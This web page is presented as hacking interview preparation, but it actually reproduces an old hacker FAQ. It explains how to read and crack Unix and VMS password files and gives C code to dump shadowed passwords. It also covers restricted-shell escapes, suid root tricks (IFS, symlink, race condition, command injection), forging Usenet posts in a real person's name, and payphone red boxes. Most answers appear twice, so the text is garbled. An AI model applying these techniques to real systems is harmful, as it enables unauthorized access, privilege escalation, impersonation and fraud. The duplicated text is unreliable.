Hacking Interview Preparation Guide Download PDF
Hacking is a criminal act, The terms hack and hacking are also used to refer to a modification of a program or device to give the user access to features that were otherwise unavailable, such as by circuit bending. It is from this usage that the term hacking is often used to refer to more nefarious criminal uses such as identity theft, credit card fraud or other actions categorized as computer crime. So get start preparation for a job interview related to the Hacking
56 Hacking Questions and Answers:
1 :: How do I access the password file under Unix?
In standard Unix the password file is /etc/passwd. On a Unix system
with either NIS/yp or password shadowing, much of the password data
may be elsewhere.
with either NIS/yp or password shadowing, much of the password data
may be elsewhere.
2 :: How do I crack Unix passwords?
Contrary to popular belief, Unix passwords cannot be decrypted. Unix
passwords are encrypted with a one way function. The login program
encrypts the text you enter at the "password:" prompt and compares
that encrypted string against the encrypted form of your password.
Password cracking software uses wordlists. Each word in the wordlist
is encrypted with each of the 2600 possible salt values and the
results are compared to the encrypted form of the target password.
The best cracking program for Unix passwords is currently Crack by
Alec Muffett. For PC-DOS, the best package to use is currently
CrackerJack.
passwords are encrypted with a one way function. The login program
encrypts the text you enter at the "password:" prompt and compares
that encrypted string against the encrypted form of your password.
Password cracking software uses wordlists. Each word in the wordlist
is encrypted with each of the 2600 possible salt values and the
results are compared to the encrypted form of the target password.
The best cracking program for Unix passwords is currently Crack by
Alec Muffett. For PC-DOS, the best package to use is currently
CrackerJack.
3 :: How do I access the password file under VMS?
Under VMS, the password file is SYS$SYSTEM:SYSUAF.DAT. However,
unlike Unix, most users do not have access to read the password file.
unlike Unix, most users do not have access to read the password file.
4 :: How do I crack VMS passwords?
Write a program that uses the SYS$GETUAF functions to compare the
results of encrypted words against the encrypted data in SYSUAF.DAT.
Two such programs are known to exist, CHECK_PASSWORD and
GUESS_PASSWORD.
results of encrypted words against the encrypted data in SYSUAF.DAT.
Two such programs are known to exist, CHECK_PASSWORD and
GUESS_PASSWORD.
5 :: What is NIS/yp?
NIS (Network Information System) in the current name for what was once
known as yp (Yellow Pages). The purpose for NIS is to allow many
machies on a network to share configuration information, including
password data. NIS is not designed to promote system security. If
your system uses NIS you will have a very short /etc/passwd file with
a line that looks like this:
+::0:0:::
To view the real password file use this command "cd/etc;ypcat passwd"
known as yp (Yellow Pages). The purpose for NIS is to allow many
machies on a network to share configuration information, including
password data. NIS is not designed to promote system security. If
your system uses NIS you will have a very short /etc/passwd file with
a line that looks like this:
+::0:0:::
To view the real password file use this command "cd/etc;ypcat passwd"
6 :: What is password shadowing?
Password shadowing is a security system where the encrypted password
field of /etc/password is replaced with a special token and the
encrypted password is stored in a seperate file which is not readable
by normal system users.
To defeat password shadowing on many systems, write a program that
uses successive calls to getpwent() to obtain the password file.
Example:
#include <pwd.h>
main()
{
struct passwd *p;
while(p=getpwent())
printf("%s:%s:%d:%d:%s:%s:%sn", p->pw_name, p->pw_passwd,
p->pw_uid, p->pw_gid, p->pw_gecos, p->pw_dir, p->pw_shell);
}
field of /etc/password is replaced with a special token and the
encrypted password is stored in a seperate file which is not readable
by normal system users.
To defeat password shadowing on many systems, write a program that
uses successive calls to getpwent() to obtain the password file.
Example:
#include <pwd.h>
main()
{
struct passwd *p;
while(p=getpwent())
printf("%s:%s:%d:%d:%s:%s:%sn", p->pw_name, p->pw_passwd,
p->pw_uid, p->pw_gid, p->pw_gecos, p->pw_dir, p->pw_shell);
}
7 :: How do I break out of a restricted shell?
On poorly implemented restricted shells you can break out of the
restricted environment by running a program that features a shell
function. A good example is vi. Run vi and use this command:
:set shell=/bin/sh
then shell using this command:
:shell
restricted environment by running a program that features a shell
function. A good example is vi. Run vi and use this command:
:set shell=/bin/sh
then shell using this command:
:shell
8 :: How do I gain root from a suid script or program?
1. Change IFS.
If the shell script calls any other programs using the system()
function call, you may be able to fool it by changing IFS. IFS is the
Internal Field Seperator that the shell uses to delimit arguments.
If the program contains a line that looks like this:
system("/bin/date")
and you change IFS to '/' the shell will them interpret the
proceeding line as:
bin date
Now, if you have a program of your own in the path called "bin" the
suid program will run your program instead of /bin/date.
To change IFS, use this command:
set IFS '/'
2. link the script to -i
Create a symbolic link named "-i" to the program. Running "-i"
will cause the interpreter shell (/bin/sh) to start up in interactive
mode. This only works on suid shell scripts.
Example:
% ln suid.sh -i
% -i
#
3. Exploit a race condition
Replace a symbolic link to the program with another program while the
kernel is loading /bin/sh.
Example:
nice -19 suidprog ; ln -s evilprog suidroot
4. Send bad input the the program.
Invoke the name of the program and a seperate command on the same
command line.
Example:
suidprog ; id
If the shell script calls any other programs using the system()
function call, you may be able to fool it by changing IFS. IFS is the
Internal Field Seperator that the shell uses to delimit arguments.
If the program contains a line that looks like this:
system("/bin/date")
and you change IFS to '/' the shell will them interpret the
proceeding line as:
bin date
Now, if you have a program of your own in the path called "bin" the
suid program will run your program instead of /bin/date.
To change IFS, use this command:
set IFS '/'
2. link the script to -i
Create a symbolic link named "-i" to the program. Running "-i"
will cause the interpreter shell (/bin/sh) to start up in interactive
mode. This only works on suid shell scripts.
Example:
% ln suid.sh -i
% -i
#
3. Exploit a race condition
Replace a symbolic link to the program with another program while the
kernel is loading /bin/sh.
Example:
nice -19 suidprog ; ln -s evilprog suidroot
4. Send bad input the the program.
Invoke the name of the program and a seperate command on the same
command line.
Example:
suidprog ; id
9 :: How do I fake posts to UseNet?
Use inews to post. Give inews the following lines:
From:
Newsgroups:
Subject:
Message-ID:
Date:
Organization:
For a moderated newsgroup, inews will also require this line:
Approved:
Then add your post and terminate with <Control-D>.
Example:
From: Dale Drew
Newsgroups: alt.2600
Subject: Please forgive me
Message-ID: <d_drew.123@tymnet.com>
Date: Fri, 13 Jun 1994 12:15:03
Organization: Tymnet Insecurity
From:
Newsgroups:
Subject:
Message-ID:
Date:
Organization:
For a moderated newsgroup, inews will also require this line:
Approved:
Then add your post and terminate with <Control-D>.
Example:
From: Dale Drew
Newsgroups: alt.2600
Subject: Please forgive me
Message-ID: <d_drew.123@tymnet.com>
Date: Fri, 13 Jun 1994 12:15:03
Organization: Tymnet Insecurity
10 :: What is a Red Box?
When a coin is inserted into a payphone, the phone emits a set of
tones. A red box is a device that simulates those tones, with the
purpose of fooling the payphone into believing you have inserted an
actual coin.
tones. A red box is a device that simulates those tones, with the
purpose of fooling the payphone into believing you have inserted an
actual coin.